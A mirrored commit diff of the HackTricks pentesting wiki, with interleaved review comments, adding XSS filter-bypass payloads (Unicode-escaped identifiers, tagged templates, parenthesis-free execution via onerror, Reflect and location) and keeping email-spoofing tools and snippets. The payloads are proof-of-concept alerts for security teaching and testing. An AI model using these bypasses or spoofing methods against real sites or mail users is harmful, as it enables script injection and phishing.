mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
GITBOOK-3770: No subject
This commit is contained in:
parent
a589831b67
commit
6456c7762e
4 changed files with 248 additions and 120 deletions
|
@ -577,7 +577,7 @@
|
|||
* [Dom Clobbering](pentesting-web/xss-cross-site-scripting/dom-clobbering.md)
|
||||
* [DOM XSS](pentesting-web/xss-cross-site-scripting/dom-xss.md)
|
||||
* [Iframes in XSS, CSP and SOP](pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md)
|
||||
* [Other JS Tricks](pentesting-web/xss-cross-site-scripting/other-js-tricks.md)
|
||||
* [Misc JS Tricks & Relevant Info](pentesting-web/xss-cross-site-scripting/other-js-tricks.md)
|
||||
* [PDF Injection](pentesting-web/xss-cross-site-scripting/pdf-injection.md)
|
||||
* [Server Side XSS (Dynamic PDF)](pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
|
||||
* [SOME - Same Origin Method Execution](pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md)
|
||||
|
|
|
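Review bot: the SUMMARY title becomes "Misc JS Tricks & Relevant Info" while the target path stays `pentesting-web/xss-cross-site-scripting/other-js-tricks.md`, so the entry title and file name no longer match. GitBook tolerates that, but the `# Misc JS Tricks & Relevant Info` H1 in that file and this SUMMARY title now have to be kept in sync by hand; if the page is being renamed, renaming the file as well (with a redirect) avoids the drift.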
@ -2,13 +2,13 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
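Review bot: the bird-emoji link on the unchanged "Join the" bullet points at `https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md`, a malformed URL that splices a repository tree path onto an escaped bracket. Since this banner is being reworked in every file touched by the commit, point it at the `https://emojipedia.org/bird/` path it already contains, in the same form as the `https://emojipedia.org/speech-balloon/` link beside it.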
@ -266,6 +266,11 @@ A **complete guide of these countermeasures** can be found in [https://seanthege
|
|||
|
||||
### SPF
|
||||
|
||||
{% hint style="danger" %}
|
||||
SPF [was "deprecated" in 2014](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). This means that instead of creating a **TXT record** in `_spf.domain.com` you create it in `domain.com` using the **same syntax**.\
|
||||
Moreover, to reuse previous spf records it's quiet common to find something like `"v=spf1 include:_spf.google.com ~all"`
|
||||
{% endhint %}
|
||||
|
||||
**Sender Policy Framework** (SPF) provides a mechanism that allows MTAs to check if a host sending an email is authorized.\
|
||||
Then, the organisations can define a list of authorised mail servers and the MTAs can query for this lists to check if the email was spoofed or not.\
|
||||
In order to define IP addresses/ranges, domains and others that are **allowed to send email on behalf a domain name**, different "**Mechanism**" cam appear in the SPF registry.
|
||||
|
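Review bot: the new hint misstates what was deprecated. RFC 7208 (2014) retired the dedicated SPF DNS resource record type (type 99), not SPF itself; the policy is published as a TXT record at the domain's own name (`domain.com`), and names like `_spf.domain.com` are only a convention for a record that other records pull in via `include:`. Suggested wording: "The SPF record type was deprecated in 2014, so the policy is published as a TXT record on `domain.com` with the same syntax." Also "quiet common" should be "quite common", and the example `"v=spf1 include:_spf.google.com ~all"` shows delegation to a third party's record via `include:`, not reuse of a previous record, so the sentence that introduces it should say so.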
@ -405,12 +410,12 @@ nmap -p25 --script smtp-open-relay 10.10.10.10 -v
|
|||
### Send Spoof Email
|
||||
|
||||
* [**https://www.mailsploit.com/index**](https://www.mailsploit.com/index)
|
||||
* ****[**http://www.anonymailer.net/**](http://www.anonymailer.net)****
|
||||
* [**https://emkei.cz/**](https://emkei.cz/)****
|
||||
* [**http://www.anonymailer.net/**](http://www.anonymailer.net)
|
||||
* [**https://emkei.cz/**](https://emkei.cz/)\*\*\*\*
|
||||
|
||||
**Or you could use a tool:**
|
||||
|
||||
* [**https://github.com/magichk/magicspoofing**](https://github.com/magichk/magicspoofing)****
|
||||
* [**https://github.com/magichk/magicspoofing**](https://github.com/magichk/magicspoofing)\*\*\*\*
|
||||
|
||||
```bash
|
||||
# This will send a test email from test@victim.com to destination@gmail.com
|
||||
|
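Review bot: the added lines still carry the stray asterisks after the emkei.cz and magicspoofing links, now as `\*\*\*\*`; escaping them turns the empty-bold artefact into literal `****` text in the rendered page instead of removing it. Drop the trailing `\*\*\*\*` from both bullets entirely.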
@ -447,7 +452,8 @@ K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
|
|||
{% tabs %}
|
||||
{% tab title="PHP" %}
|
||||
<pre class="language-php"><code class="lang-php"><strong># This will send an unsigned message
|
||||
</strong><strong>mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");</strong></code></pre>
|
||||
</strong><strong>mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");
|
||||
</strong></code></pre>
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="Python" %}
|
||||
|
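Review bot: the rewrapped `<strong>` tags move `</strong></code></pre>` onto its own line after the `mail(...)` call, which adds a trailing empty line inside the `<pre>` block; keep the closing tags on the same line as the call, as in the old version. Separately, the snippet is not runnable as shown: it lacks the `<?php` opening tag, and the `#` comment is only PHP syntax inside PHP mode, so a reader pasting it into a file would get the text echoed back instead of executed.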
@ -596,12 +602,12 @@ Entry_8:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,18 +1,6 @@
|
|||
# XSS (Cross Site Scripting)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">
|
||||
 /<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">
|
||||
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
|
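Review bot: the replacement image line gains a stray ` /` prefix (` /<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">`), which GitBook renders as literal text in front of the image; this looks like an accidental keystroke, so restore the bare `<img ...>` tag. Removing the `<details>` banner from this page while the other three files in the commit keep and reformat theirs also looks unintentional and should be confirmed.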
@ -87,6 +75,13 @@ In this case your input is reflected between **`<script> [...] </script>`** tags
|
|||
* `';-alert(1)//`
|
||||
* `\';alert(1)//`
|
||||
* If reflected inside template literals you can **embed JS expressions** using `${ ... }` syntax: `` var greetings = `Hello, ${alert(1)}` ``
|
||||
* **Unicode encode** works to write **valid javascript code**:
|
||||
|
||||
```javascript
|
||||
\u{61}lert(1)
|
||||
\u0061lert(1)
|
||||
\u{0061}lert(1)
|
||||
```
|
||||
|
||||
#### Javascript Hoisting
|
||||
|
||||
|
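Review bot: the "Unicode encode" bullet should say where the escapes are decoded. `\u{61}lert(1)`, `\u0061lert(1)` and `\u{0061}lert(1)` are accepted only because the JavaScript parser decodes Unicode escapes inside identifier names, so this applies when the input lands directly in script context; inside a string literal the same escape just yields the letter and nothing is executed. The same three lines are added again later in this commit under "Unicode Encode JS execution"; one copy with a cross-reference is easier to keep correct.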
@ -496,7 +491,13 @@ T**he XSS payload will be something like this: `" accesskey="x" onclick="alert(1
|
|||
|
||||
### Blacklist Bypasses
|
||||
|
||||
Several tricks with using different encoding were exposed already inside this section. Go **back to learn where can you use HTML encoding, Unicode encoding, URL encoding, Hex and Octal encoding and even data encoding**.
|
||||
Several tricks with using different encoding were exposed already inside this section. Go **back to learn where can you use:**
|
||||
|
||||
* **HTML encoding (HTML tags)**
|
||||
* **Unicode encoding (can be valid JS code):** `\u0061lert(1)`
|
||||
* **URL encoding**
|
||||
* **Hex and Octal encoding**
|
||||
* **data encoding**
|
||||
|
||||
**Bypasses for HTML tags and attributes**
|
||||
|
||||
|
@ -555,7 +556,18 @@ If `<>` are being sanitised you can still **escape the string** where your input
|
|||
In order to construct **strings** apart from single and double quotes JS also accepts **backticks** **` `` `** . This is known as template literals as they allow to **embedded JS expressions** using `${ ... }` syntax.\
|
||||
Therefore, if you find that your input is being **reflected** inside a JS string that is using backticks, you can abuse the syntax `${ ... }` to execute **arbitrary JS code**:
|
||||
|
||||
This can be **abused** using: `${alert(1)}`
|
||||
This can be **abused** using:
|
||||
|
||||
```javascript
|
||||
`${alert(1)}`
|
||||
`${`${`${`${alert(1)}`}`}`}`
|
||||
```
|
||||
|
||||
```````````````javascript
|
||||
// This is valid JS code, because each time the function returns itself it's recalled with ``
|
||||
function loop(){return loop}
|
||||
loop``````````````
|
||||
```````````````
|
||||
|
||||
### Encoded code execution
|
||||
|
||||
|
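Review bot: the fifteen-backtick fence around the `loop` example is unnecessary. Under CommonMark a closing fence must be a line made only of backticks, and `loop``````````````` begins with `loop`, so the four-backtick fence the file already uses for the other blocks would be enough and keeps the file consistent. The explanatory comment is right as written: `loop```` calls `loop` as a tag function with an empty template, it returns itself, and the chain is just a sequence of tagged-template calls. In the prose above the block, "they allow to embedded JS expressions" should read "they allow embedding JS expressions", and the sentence that introduces the examples is now duplicated ("This can be abused using:" with and without the inline `${alert(1)}`), so keep only the list form.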
@ -566,6 +578,14 @@ This can be **abused** using: `${alert(1)}`
|
|||
<iframe srcdoc="<SCRIPT>alert(1)</iframe>">
|
||||
```
|
||||
|
||||
### Unicode Encode JS execution
|
||||
|
||||
```javascript
|
||||
\u{61}lert(1)
|
||||
\u0061lert(1)
|
||||
\u{0061}lert(1)
|
||||
```
|
||||
|
||||
### JavaScript bypass blacklists techniques
|
||||
|
||||
**Strings**
|
||||
|
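Review bot: this "Unicode Encode JS execution" block repeats the three lines (`\u{61}lert(1)`, `\u0061lert(1)`, `\u{0061}lert(1)`) that the same commit adds to the `<script>` injection-context bullets earlier in the file; keep one copy and link the other place to it, otherwise a future correction has to be made twice.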
@ -576,6 +596,7 @@ This can be **abused** using: `${alert(1)}`
|
|||
`thisisastring`
|
||||
/thisisastring/ == "/thisisastring/"
|
||||
/thisisastring/.source == "thisisastring"
|
||||
"\h\e\l\l\o"
|
||||
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
|
||||
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
|
||||
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
|
||||
|
@ -586,6 +607,22 @@ atob("dGhpc2lzYXN0cmluZw==")
|
|||
eval(8680439..toString(30))(983801..toString(36))
|
||||
```
|
||||
|
||||
**Special escapes**
|
||||
|
||||
```javascript
|
||||
'\b' //backspace
|
||||
'\f' //form feed
|
||||
'\n' //new line
|
||||
'\r' //carriage return
|
||||
'\t' //tab
|
||||
'\b' //backspace
|
||||
'\f' //form feed
|
||||
'\n' //new line
|
||||
'\r' //carriage return
|
||||
'\t' //tab
|
||||
// Any other char escaped is just itself
|
||||
```
|
||||
|
||||
**Space substitutions inside JS code**
|
||||
|
||||
```javascript
|
||||
|
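Review bot: the five escape lines (`'\b'` through `'\t'`) are listed twice in the added "Special escapes" block; drop one copy. The closing comment "Any other char escaped is just itself" is not quite true: `\v` (vertical tab) and `\0` (NUL) are also special, `\x..`, `\u....` and `\u{...}` start hex and Unicode escapes, and a backslash immediately before a line break is a line continuation. Adding `\v` and `\0` to the list and qualifying the comment ("any other non-digit character escaped is just itself") would make it accurate.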
@ -593,29 +630,6 @@ eval(8680439..toString(30))(983801..toString(36))
|
|||
/**/
|
||||
```
|
||||
|
||||
**JavaScript without parentheses**
|
||||
|
||||
````javascript
|
||||
alert`1`
|
||||
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
|
||||
eval.call`${'alert\x2823\x29'}`
|
||||
eval.apply`${[`alert\x2823\x29`]}`
|
||||
[].sort.call`${alert}1337`
|
||||
[].map.call`${eval}\\u{61}lert\x281337\x29`
|
||||
throw onerror=alert,1337
|
||||
Function`x${'alert\x281337\x29'}x```
|
||||
'alert\x281337\x29'instanceof{[Symbol['hasInstance']]:eval}
|
||||
valueOf=alert;window+''
|
||||
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
|
||||
// or any DOMXSS sink such as location=name
|
||||
|
||||
window.name='javascript:alert(1)'
|
||||
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
|
||||
````
|
||||
|
||||
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
|
||||
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
|
||||
|
||||
**JavaScript comments (from** [**JavaScript Comments**](./#javascript-comments) **trick)**
|
||||
|
||||
```javascript
|
||||
|
@ -635,6 +649,86 @@ String.fromCharCode(8232) //0xe2 0x80 0xa8
|
|||
String.fromCharCode(8233) //0xe2 0x80 0xa8
|
||||
```
|
||||
|
||||
**JavaScript without parentheses**
|
||||
|
||||
````javascript
|
||||
// By setting location
|
||||
window.location='javascript:alert\x281\x29'
|
||||
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
|
||||
// or any DOMXSS sink such as location=name
|
||||
|
||||
// Backtips
|
||||
// Backtips pass the string as an array of lenght 1
|
||||
alert`1`
|
||||
|
||||
// Backtips + Tagged Templates + call/apply
|
||||
eval`alert\x281\x29` // This won't work as it will just return the passed array
|
||||
setTimeout`alert\x281\x29`
|
||||
eval.call`${'alert\x281\x29'}`
|
||||
eval.apply`${[`alert\x281\x29`]}`
|
||||
[].sort.call`${alert}1337`
|
||||
[].map.call`${eval}\\u{61}lert\x281337\x29`
|
||||
|
||||
// To pass several arguments you can use
|
||||
function btt(){
|
||||
console.log(arguments);
|
||||
}
|
||||
btt`${'arg1'}${'arg2'}${'arg3'}`
|
||||
|
||||
//It's possible to construct a function and call it
|
||||
Function`x${'alert(1337)'}x```
|
||||
|
||||
// .replace can use regexes and call a function if something is found
|
||||
"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
|
||||
"a".replace.call`1${/./}${alert}`
|
||||
// This happened in the previous example
|
||||
// Change "this" value of call to "1,"
|
||||
// match anything with regex /./
|
||||
// call alert with "1"
|
||||
"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead
|
||||
|
||||
// Using Reflect.apply to call any function with any argumnets
|
||||
Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
|
||||
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
|
||||
// Using Reflect.set to call set any value to a variable
|
||||
Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.
|
||||
|
||||
|
||||
|
||||
// valueOf, toString
|
||||
// These operations are called when the object is used as a primitive
|
||||
// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
|
||||
valueOf=alert;window+''
|
||||
toString=alert;window+''
|
||||
|
||||
|
||||
// Error handler
|
||||
window.onerror=eval;throw"=alert\x281\x29";
|
||||
onerror=eval;throw"=alert\x281\x29";
|
||||
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
|
||||
{onerror=eval}throw"=alert(1)" //No ";"
|
||||
onerror=alert //No ";" using new line
|
||||
throw 1337
|
||||
// Error handler + Special unicode separators
|
||||
eval("onerror=\u2028alert\u2029throw 1337");
|
||||
// Error handler + Comma separator
|
||||
// The comma separator goes through the list and returns only the last element
|
||||
var a = (1,2,3,4,5,6) // a = 6
|
||||
throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
|
||||
throw onerror=alert,1,1,1,1,1,1337
|
||||
// optional exception variables inside a catch clause.
|
||||
try{throw onerror=alert}catch{throw 1}
|
||||
|
||||
|
||||
// Has instance symbol
|
||||
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
|
||||
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
|
||||
// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
|
||||
````
|
||||
|
||||
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
|
||||
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
|
||||
|
||||
**Arbitrary function (alert) call**
|
||||
|
||||
````javascript
|
||||
|
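Review bot: spelling and comment placement in the added "JavaScript without parentheses" block. "Backtips" should be "Backticks" (three occurrences), "lenght" → "length", "argumnets" → "arguments", "objet" → "object", and "Using Reflect.set to call set any value" has a stray "call". The comment "This happened in the previous example" sits after `"a".replace.call`1${/./}${alert}`` but explains that very line, so it should go above it. The comment on `"a,".replace`a${alert}`` is also misleading: the tag receives the strings array `["a",""]`, `replace` coerces that pattern to `"a,"`, and that is why the subject string has to be `"a,"` for a match. The three consecutive blank lines before `// valueOf, toString` can be cut to one.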
@ -1326,14 +1420,18 @@ alert("XSS");
|
|||
|
||||
Find **more SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
|
||||
|
||||
## Misc JS Tricks & Relevant Info
|
||||
|
||||
{% content-ref url="other-js-tricks.md" %}
|
||||
[other-js-tricks.md](other-js-tricks.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## XSS resources
|
||||
|
||||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)\
|
||||
|
||||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)
|
||||
* [http://www.xss-payloads.com](http://www.xss-payloads.com) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt) [https://github.com/materaj/xss-list](https://github.com/materaj/xss-list) 
|
||||
* [https://github.com/ismailtasdelen/xss-payload-list](https://github.com/ismailtasdelen/xss-payload-list) 
|
||||
* [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)\
|
||||
|
||||
* [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
|
||||
* [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
|
||||
|
||||
### XSS TOOLS
|
||||
|
|
|
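Review bot: the bullet that reads `[http://www.xss-payloads.com](...) [https://github.com/Pgaijin66/XSS-Payloads/...] [https://github.com/materaj/xss-list]` crams three resources into one list item and leaves trailing spaces; split it into one link per bullet like the rest of the list. Dropping the trailing `\` hard line breaks from the two resource lines is the right call.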
@ -1,25 +1,20 @@
|
|||
|
||||
# Misc JS Tricks & Relevant Info
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## Javascript Characters Brute-Force
|
||||
|
||||
# Javascript Characters Brute-Force
|
||||
|
||||
## JavaScript Comments BF
|
||||
### JavaScript Comments BF
|
||||
|
||||
```javascript
|
||||
//This is a 1 line comment
|
||||
|
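Review bot: this hunk shows two H1 lines, `# Misc JS Tricks & Relevant Info` and `# Javascript Characters Brute-Force`. The remaining hunks in this file demote every other section from `#` to `##`, so only the page title should stay at `#`, with "Javascript Characters Brute-Force" at `##` and "JavaScript Comments BF" at `###`; please confirm that is the state this hunk leaves behind.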
@ -28,39 +23,39 @@
|
|||
-->This is a 1 line comment, but "-->" must to be at the beggining of the line
|
||||
|
||||
|
||||
for (let j = 0; j < 128; j++) {
|
||||
for (let k = 0; k < 128; k++) {
|
||||
for (let l = 0; l < 128; l++) {
|
||||
if (j == 34 || k ==34 || l ==34)
|
||||
continue;
|
||||
if (j == 0x0a || k ==0x0a || l ==0x0a)
|
||||
continue;
|
||||
if (j == 0x0d || k ==0x0d || l ==0x0d)
|
||||
continue;
|
||||
if (j == 0x3c || k ==0x3c || l ==0x3c)
|
||||
continue;
|
||||
if (
|
||||
(j == 47 && k == 47)
|
||||
||(k == 47 && l == 47)
|
||||
)
|
||||
continue;
|
||||
try {
|
||||
var cmd = String.fromCharCode(j) + String.fromCharCode(k) + String.fromCharCode(l) + 'a.orange.ctf"';
|
||||
eval(cmd);
|
||||
} catch(e) {
|
||||
var err = e.toString().split('\n')[0].split(':')[0];
|
||||
if (err === 'SyntaxError' || err === "ReferenceError")
|
||||
continue
|
||||
err = e.toString().split('\n')[0]
|
||||
}
|
||||
console.log(err,cmd);
|
||||
}
|
||||
}
|
||||
for (let j = 0; j < 128; j++) {
|
||||
for (let k = 0; k < 128; k++) {
|
||||
for (let l = 0; l < 128; l++) {
|
||||
if (j == 34 || k ==34 || l ==34)
|
||||
continue;
|
||||
if (j == 0x0a || k ==0x0a || l ==0x0a)
|
||||
continue;
|
||||
if (j == 0x0d || k ==0x0d || l ==0x0d)
|
||||
continue;
|
||||
if (j == 0x3c || k ==0x3c || l ==0x3c)
|
||||
continue;
|
||||
if (
|
||||
(j == 47 && k == 47)
|
||||
||(k == 47 && l == 47)
|
||||
)
|
||||
continue;
|
||||
try {
|
||||
var cmd = String.fromCharCode(j) + String.fromCharCode(k) + String.fromCharCode(l) + 'a.orange.ctf"';
|
||||
eval(cmd);
|
||||
} catch(e) {
|
||||
var err = e.toString().split('\n')[0].split(':')[0];
|
||||
if (err === 'SyntaxError' || err === "ReferenceError")
|
||||
continue
|
||||
err = e.toString().split('\n')[0]
|
||||
}
|
||||
//From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z
|
||||
console.log(err,cmd);
|
||||
}
|
||||
}
|
||||
}
|
||||
//From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z
|
||||
```
|
||||
|
||||
## Javascript New Lines BF
|
||||
### Javascript New Lines BF
|
||||
|
||||
```javascript
|
||||
//Javascript interpret as new line these chars:
|
||||
|
